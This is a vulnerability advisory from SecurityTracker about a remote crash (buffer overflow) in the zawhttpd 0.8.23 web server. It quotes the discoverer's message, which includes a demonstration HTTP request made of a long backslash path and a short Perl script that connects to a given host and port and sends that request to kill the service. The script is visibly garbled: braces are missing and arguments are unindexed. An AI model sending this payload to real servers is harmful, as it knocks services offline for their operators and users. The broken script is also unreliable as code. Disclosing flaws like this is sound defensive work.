zawhttpd Can Be Crashed By Remote Users
SecurityTracker Alert ID: 1016030|
SecurityTracker URL: http://securitytracker.com/id/1016030
(Links to External Site)
Updated: Dec 4 2009|
Original Entry Date: May 4 2006
Denial of service via network|
Exploit Included: Yes |
Version(s): 0.8.23; possibly earlier versions|
A vulnerability was reported in zawhttpd. A remote user can cause denial of service conditions.|
A remote user can send specially crafted data to cause the target service to crash.
A demonstration exploit request is provided:
GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0
Kamil 'K3' Sienicki discovered this vulnerability.
A remote user can cause denial of service conditions.|
No solution was available at the time of this entry.|
Vendor URL: www.norz.org/zawhttpd.html (Links to External Site)
|Underlying OS: Linux (Any), UNIX (Any)|
Source Message Contents
Subject: zawhttpd - Buffer Overflow|
Version: 0.8.23 previous version probably too.
Problem: Buffer Overflow
Discovered by: Kamil 'K3' Sienicki
zawhttpd is a mini Web server that features HTTP/1.0 and 1.1 support,
keep-alive persistent connections, IPv6 support, GET and HEAD requests,
chunked encoding and content-range, directory listing, basic
access logging, daemon mode, and more.
A remote user can supply a specially crafted data which crash server.
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV,
PeerPort => $ARGV,
Proto => "TCP"))
print "Attempting to kill zawhttpd at $ARGV:$ARGV ...";
print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
print "perl zawhttpd.pl localhost 80 \n";
print "Cannot connect to $ARGV:$ARGV\n";
Kamil 'K3' Sienicki